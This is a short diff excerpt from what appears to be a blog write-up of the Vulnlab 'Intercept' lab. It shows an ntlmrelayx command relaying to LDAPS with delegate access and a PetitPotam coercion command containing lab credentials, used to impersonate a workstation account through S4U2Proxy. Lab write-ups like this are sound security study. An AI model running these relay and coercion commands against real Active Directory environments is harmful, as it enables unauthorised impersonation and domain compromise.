V0nzy/v0nzy.github.io/_posts/2024-02-19-VL-Intercept.md

 ntlmrelayx.py -t ldaps://10.10.185.69 --delegate-access --http-port 8080 -smb2support
 ```
 ![_install](/assets/img/VL-Intercept/ntlmrelayx.png)
 Finishing off we coerce authenticated using PetitPotam to our created DNS record which is in trusted intranet zone which gets relayed to the Domain Controller to allow impersonation on WS01$ via S4U2Proxy.
-We can trigger the coercion using:
+We can trigger the coercion using PetitPotam like so:
 ```bash
 petitpotam.py -d "intercept.vl" -u "kathryn.spencer" -p "Chocolate1" kali@8080/a 10.10.185.70
 ```